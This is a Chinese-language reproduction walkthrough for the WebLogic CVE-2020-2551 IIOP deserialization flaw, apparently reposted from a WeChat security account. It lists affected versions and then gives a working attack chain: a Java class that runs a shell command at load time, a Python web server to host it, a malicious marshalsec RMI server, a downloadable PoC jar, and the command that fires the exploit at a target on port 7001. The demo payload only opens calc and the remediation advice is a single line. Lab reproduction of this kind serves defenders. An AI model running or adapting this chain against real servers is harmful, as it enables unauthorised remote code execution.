Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

admin 2021年3月26日05:59:58评论224 views字数 941阅读3分8秒阅读模式

漏洞概述

攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。

IIOP协议以Java接口的形式对远程对象进行访问,默认启用。

 

影响版本:

weblogic 10.3.6

weblogic 12.1.3.0

weblogic 12.2.1.3.0

weblogic 12.2.1.4.0

 

环境搭建

下载地址

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


 

漏洞复现

访问http://your-ip:7001/console看到页面

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


构造如下java,保存为exp.java

import java.io.IOException;public class exp {static{try {java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});} catch (IOException e) {e.printStackTrace();}}public static void main(String[] args) {

}}


Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

 

编译生成exp.class

javac exp.java -source 1.6 -target 1.6


启动web服务

python -m SimpleHTTPServer 80


 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


使用marshalsec起一个恶意的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.0.103/#exp” 1099


 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


Poc下载地址

https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg


漏洞攻击,成功弹出calc

java -jar weblogic_CVE_2020_2551.jar 192.168.0.103 7001 rmi://192.168.0.103:1099/exp


 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


 

修复建议

升级到安全版本

 

 


本文始发于微信公众号(锋刃科技):Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月26日05:59:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic CVE-2020-2551 IIOP反序列化漏洞复现http://cn-sec.com/archives/298431.html

发表评论

匿名网友 填写信息